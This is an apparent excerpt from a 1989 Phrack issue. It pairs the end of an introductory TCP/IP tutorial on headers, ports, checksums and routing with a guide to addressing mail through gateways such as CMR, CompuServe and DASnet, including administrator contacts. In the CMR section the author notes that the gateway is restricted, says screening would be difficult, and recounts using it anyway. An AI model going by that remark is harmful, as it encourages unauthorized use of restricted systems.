  752. - A protocol such as TCP that provides services need by many
  753. applications.
  754.  
  755. - IP, which provides the basic service of getting datagrams to
  756.   their destination.
  757.  
  758. - The protocols needed to manage a specific physical medium, such
  759.   as Ethernet or a point to point line.
  760.  
  761. TCP/IP is based on the "catenet model."  (This is described in
  762. more detail in IEN 48.)  This model assumes that there are a
  763. large number of independent networks connected together by
  764. gateways.  The user should be able to access computers or other
  765. resources on any of these networks.  Datagrams will often pass
  766. through a dozen different networks before getting to their final
  767. destination.  The routing needed to accomplish this should be
  768. completely invisible to the user.  As far as the user is
  769. concerned, all he needs to know in order to access another system
  770. is an "Internet address."  This is an address that looks like
  771. 128.6.4.194.  It is actually a 32-bit number.  However it is
  772. normally written as 4 decimal numbers, each representing 8 bits
  773. of the address.  (The term "octet" is used by Internet
  774. documentation for such 8-bit chunks.  The term "byte" is not
  775. used, because TCP/IP is supported by some computers that have
  776. byte sizes other than 8 bits.)
  777.  
  778. Generally the structure of the address gives you some information
  779. about how to get to the system.  For example, 128.6 is a network
  780. number assigned by a central authority to Rutgers University.
  781. Rutgers uses the next octet to indicate which of the campus
  782. Ethernets is involved.  128.6.4 happens to be an Ethernet used by
  783. the Computer Science Department. The last octet allows for up to
  784. 254 systems on each Ethernet.  (It is 254 because 0 and 255 are
  785. not allowed, for reasons that will be discussed later.)  Note
  786. that 128.6.4.194 and 128.6.5.194 would be different systems.  The
  787. structure of an Internet address is described in a bit more
  788. detail later.
  789.  
  790. Of course I normally refer to systems by name, rather than by
  791. Internet address.  When I specify a name, the network software
  792. looks it up in a database, and comes up with the corresponding
  793. Internet address.  Most of the network software deals strictly in
  794. terms of the address.  (RFC 882 describes the name server
  795. technology used to handle this lookup.)
  796.  
  797. TCP/IP is built on "connectionless" technology.  Information is
  798. transfered as a sequence of "datagrams."  A datagram is a
  799. collection of data that is sent as a single message.  Each of
  800. these datagrams is sent through the network individually.  There
  801. are provisions to open connections (i.e. to start a conversation
  802. that will continue for some time).  However at some level,
  803. information from those connections is broken up into datagrams,
  804. and those datagrams are treated by the network as completely
  805. separate.  For example, suppose you want to transfer a 15000
  806. octet file.  Most networks can't handle a 15000 octet datagram.
  807. So the protocols will break this up into something like 30
  808. 500-octet datagrams.  Each of these datagrams will be sent to the
  809. other end.  At that point, they will be put back together into
  810. the 15000-octet file.  However while those datagrams are in
  811. transit, the network doesn't know that there is any connection
  812. between them.  It is perfectly possible that datagram 14 will
  813. actually arrive before datagram 13.  It is also possible that
  814. somewhere in the network, an error will occur, and some datagram
  815. won't get through at all.  In that case, that datagram has to be
  816. sent again.
  817.  
  818. Note by the way that the terms "datagram" and "packet" often seem
  819. to be nearly interchangable.  Technically, datagram is the right
  820. word to use when describing TCP/IP.  A datagram is a unit of
  821. data, which is what the protocols deal with.  A packet is a
  822. physical thing, appearing on an Ethernet or some wire.  In most
  823. cases a packet simply contains a datagram, so there is very
  824. little difference.  However they can differ.  When TCP/IP is used
  825. on top of X.25, the X.25 interface breaks the datagrams up into
  826. 128-byte packets.  This is invisible to IP, because the packets
  827. are put back together into a single datagram at the other end
  828. before being processed by TCP/IP.  So in this case, one IP
  829. datagram would be carried by several packets.  However with most
  830. media, there are efficiency advantages to sending one datagram
  831. per packet, and so the distinction tends to vanish.
  832.  
  833.  
  834. * The TCP level
  835.  
  836. Two separate protocols are involved in handling TCP/IP datagrams.
  837. TCP (the "transmission control protocol") is responsible for
  838. breaking up the message into datagrams, reassembling them at the
  839. other end, resending anything that gets lost, and putting things
  840. back in the right order.  IP (the "internet protocol") is
  841. responsible for routing individual datagrams.  It may seem like
  842. TCP is doing all the work.  However in the Internet, simply
  843. getting a datagram to its destination can be a complex job.  A
  844. connection may require the datagram to go through several
  845. networks at Rutgers, a serial line to the John von Neuman
  846. Supercomputer Center, a couple of Ethernets there, a series of
  847. 56Kbaud phone lines to another NSFnet site, and more Ethernets on
  848. another campus.  Keeping track of the routes to all of the
  849. destinations and handling incompatibilities among different
  850. transport media turns out to be a complex job.  Note that the
  851. interface between TCP and IP is fairly simple.  TCP simply hands
  852. IP a datagram with a destination.  IP doesn't know how this
  853. datagram relates to any datagram before it or after it.
  854.  
  855. It may have occurred to you that something is missing here.  I
  856. have talked about Internet addresses, but not about how you keep
  857. track of multiple connections to a given system.  Clearly it
  858. isn't enough to get a datagram to the right destination.  TCP has
  859. to know which connection this datagram is part of.  This task is
  860. referred to as "demultiplexing."  In fact, there are several
  861. levels of demultiplexing going on in TCP/IP.  The information
  862. needed to do this demultiplexing is contained in a series of
  863. "headers."  A header is simply a few extra octets tacked onto the
  864. beginning of a datagram by some protocol in order to keep track
  865. of it.  It's a lot like putting a letter into an envelope and
  866. putting an address on the outside of the envelope.  Except with
  867. modern networks it happens several times.  It's like you put the
  868. letter into a little envelope, your secretary puts that into a
  869. somewhat bigger envelope, the campus mail center puts that
  870. envelope into a still bigger one, etc.  Here is an overview of
  871. the headers that get stuck on a message that passes through a
  872. typical TCP/IP network:
  873.  
  874. It starts with a single data stream, say a file you are trying to
  875. send to some other computer:
  876.  
  877.      ......................................................
  878.  
  879. TCP breaks it up into manageable chunks.  (In order to do this,
  880. TCP has to know how large a datagram your network can handle.
  881. Actually, the TCP's at each end say how big a datagram they can
  882. handle, and then they pick the smallest size.)
  883.  
  884.      .... .... .... .... .... .... .... ....
  885.  
  886. TCP puts a header at the front of each datagram.  This header
  887. actually contains at least 20 octets, but the most important ones
  888. are a source and destination "port number" and a "sequence
  889. number."  The port numbers are used to keep track of different
  890. conversations.  Suppose 3 different people are transferring
  891. files.  Your TCP might allocate port numbers 1000, 1001, and 1002
  892. to these transfers.  When you are sending a datagram, this
  893. becomes the "source" port number, since you are the source of the
  894. datagram.  Of course the TCP at the other end has assigned a port
  895. number of its own for the conversation.  Your TCP has to know the
  896. port number used by the other end as well.  (It finds out when
  897. the connection starts, as I will explain below.)  It puts this in
  898. the "destination" port field.  Of course if the other end sends a
  899. datagram back to you, the source and destination port numbers
  900. will be reversed, since then it will be the source and you will
  901. be the destination.  Each datagram has a sequence number.  This
  902. is used so that the other end can make sure that it gets the
  903. datagrams in the right order, and that it hasn't missed any.
  904. (See the TCP specification for details.)  TCP doesn't number the
  905. datagrams, but the octets.  So if there are 500 octets of data in
  906. each datagram, the first datagram might be numbered 0, the second
  907. 500, the next 1000, the next 1500, etc.  Finally, I will mention
  908. the Checksum.  This is a number that is computed by adding up all
  909. the octets in the datagram (more or less - see the TCP spec).
  910. The result is put in the header.  TCP at the other end computes
  911. the checksum again.  If they disagree, then something bad
  912. happened to the datagram in transmission, and it is thrown away.
  913. So here's what the datagram looks like now.
  914.  
  915.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  916.        |          Source Port           |       Destination Port       |
  917.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  918.        |                         Sequence Number                       |
  919.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  920.        |                      Acknowledgment Number                    |
  921.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  922.        |  Data |           |U|A|P|R|S|F|                               |
  923.        | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
  924.        |       |           |G|K|H|T|N|N|                               |
  925.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  926.        |           Checksum            |         Urgent Pointer        |
  927.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  928.        |   your data ... next 500 octets                               |
  929.        |   ......                                                      |
  930.  
  931. If you abbreviate the TCP header as "T", the whole file now looks like this:
  932.  
  933.      T.... T.... T.... T.... T.... T.... T....
  934.  
  935. You will note that there are items in the header that I have not
  936. described above.  They are generally involved with managing the
  937. connection.  In order to make sure the datagram has arrived at
  938. its destination, the recipient has to send back an
  939. "acknowledgement."  This is a datagram whose "Acknowledgement
  940. number" field is filled in.  For example, sending a packet with
  941. an acknowledgement of 1500 indicates that you have received all
  942. the data up to octet number 1500.  If the sender doesn't get an
  943. acknowledgement within a reasonable amount of time, it sends the
  944. data again.  The window is used to control how much data can be
  945. in transit at any one time.  It is not practical to wait for each
  946. datagram to be acknowledged before sending the next one.  That
  947. would slow things down too much.  On the other hand, you can't
  948. just keep sending, or a fast computer might overrun the capacity
  949. of a slow one to absorb data.  Thus each end indicates how much
  950. new data it is currently prepared to absorb by putting the number
  951. of octets in its "Window" field.  As the computer receives data,
  952. the amount of space left in its window decreases.  When it goes
  953. to zero, the sender has to stop.  As the receiver processes the
  954. data, it increases its window, indicating that it is ready to
  955. accept more data. Often the same datagram can be used to
  956. acknowledge receipt of a set of data and to give permission for
  957. additional new data (by an updated window).  The "Urgent" field
  958. allows one end to tell the other to skip ahead in its processing
  959. to a particular octet.  This is often useful for handling
  960. asynchronous events, for example when you type a control
  961. character or other command that interrupts output.  The other
  962. fields are not pertinent to understanding what I am trying to
  963. explain in this article.
  964.  
  965.  
  966. * The IP Level
  967.  
  968. TCP sends each datagram to IP.  Of course it has to tell IP the
  969. Internet address of the computer at the other end.  Note that
  970. this is all IP is concerned about.  It doesn't care about what is
  971. in the datagram, or even in the TCP header.  IP's job is simply
  972. to find a route for the datagram and get it to the other end.  In
  973. order to allow gateways or other intermediate systems to forward
  974. the datagram, it adds its own header.  The main things in this
  975. header are the source and destination Internet address (32-bit
  976. addresses, like 128.6.4.194), the protocol number, and another
  977. checksum.  The source Internet address is simply the address of
  978. your machine.  (This is necessary so the other end knows where
  979. the datagram came from.)  The destination Internet address is the
  980. address of the other machine.  (This is necessary so any gateways
  981. in the middle know where you want the datagram to go.)  The
  982. protocol number tells IP at the other end to send the datagram to
  983. TCP.
  984.  
  985. Although most IP traffic uses TCP, there are other protocols that
  986. can use IP, so you have to tell IP which protocol to send the
  987. datagram to.  Finally, the checksum allows IP at the other end to
  988. verify that the header wasn't damaged in transit.  Note that TCP
  989. and IP have separate checksums.  IP needs to be able to verify
  990. that the header didn't get damaged in transit, or it could send a
  991. message to the wrong place.  It is both more efficient and safer
  992. to have TCP compute a separate checksum for the TCP header and
  993. data.  Once IP has tacked on its header, here's what the message
  994. looks like:
  995.  
  996.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  997.       |Version|  IHL  |Type of Service|          Total Length         |
  998.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  999.       |         Identification        |Flags|      Fragment Offset    |
  1000.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1001.       |  Time to Live |    Protocol   |         Header Checksum       |
  1002.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1003.       |                       Source Address                          |
  1004.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1005.       |                    Destination Address                        |
  1006.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1007.       |  TCP header, then your data ......                            |
  1008.       |                                                               |
  1009.  
  1010. If you represent the IP header by an "I", your file now looks like this:
  1011.  
  1012.      IT....   IT....   IT....   IT....   IT....   IT....   IT....
  1013.  
  1014. Again, the header contains some additional fields that will not
  1015. be discussed in this article because they are not relevent to
  1016. understanding the process.  The flags and fragment offset are
  1017. used to keep track of the pieces when a datagram has to be split
  1018. up.  This can happen when datagrams are forwarded through a
  1019. network for which they are too big.  (This will be discussed a
  1020. bit more below.) The time to live is a number that is decremented
  1021. whenever the datagram passes through a system.  When it goes to
  1022. zero, the datagram is discarded.  This is done in case a loop
  1023. develops in the system somehow.  Of course this should be
  1024. impossible, but well-designed networks are built to cope with
  1025. "impossible" conditions.
  1026.  
  1027. At this point, it's possible that no more headers are needed.  If
  1028. your computer happens to have a direct phone line connecting it
  1029. to the destination computer, or to a gateway, it may simply send
  1030. the datagrams out on the line (though likely a synchronous
  1031. protocol such as HDLC would be used, and it would add at least a
  1032. few octets at the beginning and end).
  1033.  
  1034.  
  1035. * The Ethernet Level
  1036.  
  1037. Most networks these days use Ethernet which has its own
  1038. addresses.  The people who designed Ethernet wanted to make sure
  1039. that no two machines would end up with the same Ethernet address.
  1040. Furthermore, they didn't want the user to have to worry about
  1041. assigning addresses.  So each Ethernet controller comes with an
  1042. address built-in from the factory.  In order to make sure that
  1043. they would never have to reuse addresses, the Ethernet designers
  1044. allocated 48 bits for the Ethernet address.  People who make
  1045. Ethernet equipment have to register with a central authority, to
  1046. make sure that the numbers they assign don't overlap any other
  1047. manufacturer.  Ethernet is a "broadcast medium."  That is, it is
  1048. in effect like an old party line telephone.  When you send a
  1049. packet out on the Ethernet, every machine on the network sees the
  1050. packet.  So something is needed to make sure that the right
  1051. machine gets it.  As you might guess, this involves the Ethernet
  1052. header.
  1053.  
  1054. Every Ethernet packet has a 14-octet header that includes the
  1055. source and destination Ethernet address, and a type code.  Each
  1056. machine is supposed to pay attention only to packets with its own
  1057. Ethernet address in the destination field.  (It's perfectly
  1058. possible to cheat, which is one reason that Ethernet
  1059. communications are not terribly secure.)  Note that there is no
  1060. connection between the Ethernet address and the Internet address.
  1061. Each machine has to have a table of what Ethernet address
  1062. corresponds to what Internet address.  (I will describe how this
  1063. table is constructed a bit later.)  In addition to the addresses,
  1064. the header contains a type code.  The type code is to allow for
  1065. several different protocol families to be used on the same
  1066. network.  So you can use TCP/IP, DECnet, Xerox NS, etc. at the
  1067. same time. Each of them will put a different value in the type
  1068. field.  Finally, there is a checksum.  The Ethernet controller
  1069. computes a checksum of the entire packet.  When the other end
  1070. receives the packet, it recomputes the checksum, and throws the
  1071. packet away if the answer disagrees with the original.  The
  1072. checksum is put on the end of the packet, not in the header.  The
  1073. final result is that your message looks like this:
  1074.  
  1075.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1076.       |       Ethernet destination address (first 32 bits)            |
  1077.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1078.       | Ethernet dest (last 16 bits)  |Ethernet source (first 16 bits)|
  1079.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1080.       |       Ethernet source address (last 32 bits)                  |
  1081.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1082.       |        Type code              |
  1083.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1084.       |  IP header, then TCP header, then your data                   |
  1085.       |                                                               |
  1086.           ...
  1087.       |                                                               |
  1088.       |   end of your data                                            |
  1089.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1090.       |                       Ethernet Checksum                       |
  1091.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1092.  
  1093. If you represent the Ethernet header with "E", and the Ethernet
  1094. checksum with "C", your file now looks like this:
  1095.  
  1096.      EIT....C   EIT....C   EIT....C   EIT....C   EIT....C
  1097.  
  1098. When these packets are received by the other end, of course all
  1099. the headers are removed.  The Ethernet interface removes the
  1100. Ethernet header and the checksum.  It looks at the type code.
  1101. Since the type code is the one assigned to IP, the Ethernet
  1102. device driver passes the datagram up to IP.  IP removes the IP
  1103. header.  It looks at the IP protocol field.  Since the protocol
  1104. type is TCP, it passes the datagram up to TCP.  TCP now looks at
  1105. the sequence number.  It uses the sequence numbers and other
  1106. information to combine all the datagrams into the original file.
  1107.  
  1108. This ends my initial summary of TCP/IP.  There are still some
  1109. crucial concepts I have not gotten to, so in part two, I will go
  1110. back and add details in several areas.  (For detailed
  1111. descriptions of the items discussed here see, RFC 793 for TCP,
  1112. RFC 791 for IP, and RFC's 894 and 826 for sending IP over
  1113. Ethernet.)
  1114. __________________________________________________________________
  1115.  
  1116.                                 ==Phrack Inc.==
  1117.  
  1118.                      Volume Three, Issue 28, File #4 of 12
  1119.  
  1120.                               Network Miscellany
  1121.                               ~~~~~~~~~~~~~~~~~~
  1122.                                  by Taran King
  1123.  
  1124.                                  June 1, 1989
  1125.  
  1126.  
  1127. ACSNET
  1128. ~~~~~~
  1129. Australian Computer Science Network (ACSNET), also known as Oz,
  1130. has its gateway through the CSNET node munnari.oz.au and if you
  1131. cannot directly mail to the .oz.au domain, try either
  1132. username%munnari.oz.au@UUNET.UU.NET or
  1133. munnari!username@UUNET.UU.NET.
  1134.  
  1135. AT&T MAIL
  1136. ~~~~~~~~~
  1137. AT&T Mail is a mailing service of AT&T, probably what you might
  1138. call it's MCI-Mail equivalent.  It is available on the UUCP
  1139. network as node name attmail but I've had problems having mail
  1140. get through.  Apparently, it does cost money to mail to this
  1141. service and the surrounding nodes are not willing to pick up the
  1142. tab for the ingoing mail, or at least, this has seemingly been
  1143. the case thus far.  I believe, though, that perhaps routing to
  1144. att!attmail!user would work.
  1145.  
  1146. AT&T recently announced six new X.400 interconnections between
  1147. AT&T Mail and electronic mail services in the U.S., Korea,
  1148. Sweden, Australia, and Finland.  In the U.S., AT&T Mail is now
  1149. interconnected with Telenet Communications Corporation's service,
  1150. Telemail, allowing users of both services to exchange messages
  1151. easily.  With the addition of these interconnections, the AT&T
  1152. Mail Gateway 400 Service allows AT&T Mail subscribers to exchange
  1153. messages with users of the following electronic messaging
  1154. systems:
  1155.  
  1156. Company                    E-Mail Name*            Country
  1157. -------                    ------------            -------
  1158. TeleDelta                  TeDe 400                Sweden
  1159. OTC                        MPS400                  Australia
  1160. Telecom-Canada             Envoy100                Canada
  1161. DACOM                      DACOM MHS               Korea
  1162. P&T-Tele                   MailNet 400             Finland
  1163. Helsinki Telephone Co.     ELISA                   Finland
  1164. Dialcom                    Dialcom                 USA
  1165. Telenet                    Telemail                USA
  1166. KDD                        Messavia                Japan
  1167. Transpac                   ATLAS400                France
  1168.  
  1169. The interconnections are based on the X.400 standard, a set of
  1170. guidelines for the format, delivery and receipt of electronic
  1171. messages recommended by an international standards committee the
  1172. CCITT.  International X.400 messages incur a surcharge.  They
  1173. are:
  1174.  
  1175.                  To Canada:
  1176.                     Per note:            $.05
  1177.                     Per message unit:    $.10
  1178.  
  1179.                  To other international locations:
  1180.                     Per note:            $.20
  1181.                     Per message unit:    $.50
  1182.  
  1183. There is no surcharge for X.400 messages within the U.S.  The
  1184. following are contacts to speak with about mailing through these
  1185. mentioned networks.  Other questions can be directed through AT&T
  1186. Mail's toll-free number, 1-800-624-5672.
  1187.  
  1188. MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
  1189. Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
  1190. Transpac                                    AT&T
  1191. Phone:  3399283203                          Morristown, NJ  07960
  1192. Phone:  +1 201 644 1838
  1193.  
  1194. MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
  1195. Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
  1196. Dialcom                                     Nokia Data
  1197. South Plainfield, NJ  07080                 Phone:  01135804371
  1198. Phone:  +1 441 493 3843
  1199.  
  1200. MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
  1201. Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
  1202. Telecom Canada                              Kokusai Denshin Denwa CO.
  1203. Phone:  +1 613 567 7584                     Phone:  8133477419
  1204.  
  1205. MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
  1206. Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
  1207. Gen Directorate Of Post &                   AT&T Information Systems
  1208. Phone:  35806921730                         Lincroft, NJ  07738
  1209.                                             Phone:  +1 201 576 2658
  1210.  
  1211. MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
  1212. Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
  1213. GTE Telenet Comm Corp                                       Gateway
  1214. Reston, VA  22096                           AT&T
  1215. Phone:  +1 703 689 6034                     Lincroft, NJ  08838
  1216.                                             Phone:  +1 800 624 5672
  1217.  
  1218. CMR
  1219. ~~~
  1220. Previously known as Intermail, the Commercial Mail Relay (CMR)
  1221. Service is a mail relay service between the Internet and three
  1222. commercial electronic mail systems:  US Sprint/Telenet, MCI-Mail,
  1223. and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
  1224.  
  1225. An important note:  The only requirement for using this mail
  1226. gateway is that the work conducted must be DARPA sponsored
  1227. research and other approved government business.  Basically, this
  1228. means that unless you've got some government-related business,
  1229. you're not supposed to be using this gateway.  Regardless, it
  1230. would be very difficult for them to screen everything that goes
  1231. through their gateway.  Before I understood the requirements of
  1232. this gateway, I was sending to a user of MCI-Mail and was not
  1233. contacted about any problems with that communication.
  1234. Unfortunately, I mistyped the MCI-Mail address on one of the
  1235. letters and that letter ended up getting read by system
  1236. administrators who then informed me that I was not to be using
  1237. that system, as well as the fact that they would like to bill me
  1238. for using it.  That was an interesting thought on their part
  1239. anyway, but do note that using this service does incur charges.
  1240.  
  1241. The CMR mailbox address in each system corresponds to the label:
  1242.  
  1243.           Telemail:  [Intermail/USCISI]TELEMAIL/USA
  1244.           MCI-Mail:  Intermail      or      107-8239
  1245.           CompMail:  Intermail      or      CMP0817
  1246.           NSF-Mail:  Intermail      or      NSF153
  1247.          USDA-Mail:  Intermail      or      AGS9999
  1248.  
  1249. Addressing examples for each e-mail system are as follows:
  1250.  
  1251. MCIMAIL:
  1252.    123-4567             seven digit address
  1253.    Everett T. Bowens    person's name (must be unique!)
  1254.  
  1255. COMPMAIL:
  1256.    CMP0123              three letters followed by three or four digits
  1257.    S.Cooper             initial, then "." and then last name
  1258.    134:CMP0123          domain, then ":" and then combination system and
  1259.                         account number
  1260.  
  1261. NSFMAIL:
  1262.    NSF0123              three letters followed by three or four digits
  1263.    A.Phillips           initial, then "." and then last name
  1264.    157:NSF0123          domain, then ":" and then combination system and
  1265.                          account number
  1266.  
  1267. USDAMAIL:
  1268.    AGS0123              three letters followed by three or four digits
  1269.    P.Shifter            initial, then "." and then last name
  1270.    157:AGS0123          domain, then ":" and then combination system and
  1271.                          account number
  1272.  
  1273. TELEMAIL:
  1274.    BARNOC               user (directly on Telemail)
  1275.    BARNOC/LODH          user/organization (directly on Telemail)
  1276.    [BARNOC/LODH]TELEMAIL/USA
  1277.                          [user/organization]system branch/country
  1278.  
  1279. The following are other Telenet system branches/countries that
  1280. can be mailed to:
  1281.  
  1282. TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
  1283. TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
  1284. ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
  1285. GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
  1286. USDA/USA
  1287.  
  1288.      Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
  1289. it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
  1290. subdivisions of OMNET:
  1291.  
  1292.          AIR     Atmospheric Sciences
  1293.          EARTH   Solid Earth Sciences
  1294.          LIFE    Life Sciences
  1295.          OCEAN   Ocean Sciences
  1296.          POLAR   Interdisciplinary Polar Studies
  1297.          SPACE   Space Science and Remote Sensing
  1298.  
  1299. The following is a list of DIALCOM systems available in the
  1300. listed countries with their domain and system numbers:
  1301.  
  1302. Service Name            Country             Domain Number    System Number
  1303. ~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
  1304. Keylink-Dialcom         Australia           60               07, 08, 09
  1305. Dialcom                 Canada              20               20, 21, 22, 23, 24
  1306. DPT Databoks            Denmark             124              71
  1307. Telebox                 Finland             127              62
  1308. Telebox                 West Germany        30               15, 16
  1309. Dialcom                 Hong Kong           80               88, 89
  1310. Eirmail                 Ireland             100              74
  1311. Goldnet                 Israel              50               05, 06
  1312. Mastermail              Italy               130              65, 67
  1313. Mastermail              Italy               1                66, 68
  1314. Dialcom                 Japan               70               13, 14
  1315. Dialcom                 Korea               1                52
  1316. Telecom Gold            Malta               100              75
  1317. Dialcom                 Mexico              1                52
  1318. Memocom                 Netherlands         124              27, 28, 29
  1319. Memocom                 Netherlands         1                55
  1320. Starnet                 New Zealand         64               01, 02
  1321. Dialcom                 Puerto Rico         58               25
  1322. Telebox                 Singapore           88               10, 11, 12
  1323. Dialcom                 Taiwan              1                52
  1324. Telecom Gold            United Kingdom      100              01, 04, 17,
  1325. 80-89
  1326. DIALCOM                 USA                 1                29, 30, 31, 32,
  1327.                                                              33, 34, 37, 38,
  1328.                                                              41-59, 61, 62, 63,
  1329.                                                              90-99
  1330.  
  1331.  NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
  1332.         username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
  1333.         mail to NASAMAIL or GSFCMAIL.
  1334.  
  1335. For more information and instructions on how to use CMR, send a
  1336. message to the user support group at
  1337. intermail-request@intermail.isi.edu (you'll get basically what
  1338. I've listed plus maybe a bit more).  Please read Chapter 3 of The
  1339. Future Transcendent Saga (Limbo to Infinity) for specifics on
  1340. mailing to these destination mailing systems.
  1341.  
  1342. COMPUSERVE
  1343. ~~~~~~~~~~
  1344. CompuServe is well known for its games and conferences.  It does, though, have
  1345. mailing capability.  Now, they have developed their own Internet domain, called
  1346. COMPUSERVE.COM.  It is relatively new and mail can be routed through either
  1347. TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
  1348.  
  1349. Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
  1350.          TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
  1351.  
  1352. The CompuServe link appears to be a polled UUCP connection at the
  1353. gateway machine.  It is actually managed via a set of shell
  1354. scripts and a comm utility called xcomm, which operates via
  1355. command scripts built on the fly by the shell scripts during
  1356. analysis of what jobs exist to go into and out of CompuServe.
  1357.  
  1358. CompuServe subscriber accounts of the form 7xxxx,yyyy can be
  1359. addressed as 7xxxx.yyyy@compuserve.com.  CompuServe employees can
  1360. be addressed by their usernames in the csi.compuserve.com
  1361. subdomain.  CIS subscribers write mail to
  1362. ">inet:user@host.domain" to mail to users on the Wide-Area
  1363. Networks, where ">gateway:" is CompuServe's internal gateway
  1364. access syntax.  The gateway generates fully-RFC-compliant
  1365. headers.
  1366.  
  1367. To fully extrapolate -- from the CompuServe side, you would use
  1368. their EasyPlex mail system to send mail to someone in BITNET or
  1369. the Internet.   For example, to send me mail at my Bitnet id, you
  1370. would address it to:
  1371.  
  1372.             INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
  1373.  
  1374. Or to my Internet id:
  1375.  
  1376.             INET:C488869@UMCVMB.MISSOURI.EDU
  1377.  
  1378. Now, if you have a BITNET to Internet userid, this is a silly
  1379. thing to do, since your connect time to CompuServe costs you
  1380. money.  However, you can use this information to let people on
  1381. CompuServe contact YOU.  CompuServe Customer Service says that
  1382. there is no charge to either receive or send a message to the
  1383. Internet or BITNET.
  1384.  
  1385. DASNET
  1386. ~~~~~~
  1387. DASnet is a smaller network that connects to the Wide-Area
  1388. Networks but charges for their service.  DASnet subscribers get
  1389. charged for both mail to users on other networks AND mail for
  1390. them from users of other networks.  The following is a brief
  1391. description of DASnet, some of which was taken from their
  1392. promotional text letter.
  1393.  
  1394. DASnet allows you to exchange electronic mail with people on more
  1395. than 20 systems and networks that are interconnected with DASnet.
  1396. One of the drawbacks, though, is that, after being subscribed to
  1397. these services, you must then subscribe to DASnet, which is a
  1398. separate cost.  Members of Wide-Area networks can subscribe to
  1399. DASnet too.  Some of the networks and systems reachable through
  1400. DASnet include the following:
  1401.  
  1402.      ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
  1403.      Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
  1404.      PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
  1405.      Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
  1406.      WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
  1407.      all of the time.  As of the writing of this file, Connect, GoverNET,
  1408.      MacNET, and The American Institute of Physics PI-MAIL are soon to be
  1409.      connected.
  1410.  
  1411. You can get various accounts on DASnet including:
  1412.  
  1413.   o  Corporate Accounts -- If your organization wants more than one individual
  1414.                            subscription.
  1415.   o  Site Subscriptions -- If you want DASnet to link directly to your
  1416.                            organization's electronic mail system.
  1417.  
  1418. To send e-mail through DASnet, you send the message to the DASnet
  1419. account on your home system.  You receive e-mail at your mailbox,
  1420. as you do now.  On the Wide-Area Networks, you send mail to
  1421. XB.DAS@STANFORD.BITNET.  On the Subject:  line, you type the
  1422. DASnet address in brackets and then the username just outside of
  1423. them.  The real subject can be expressed after the username
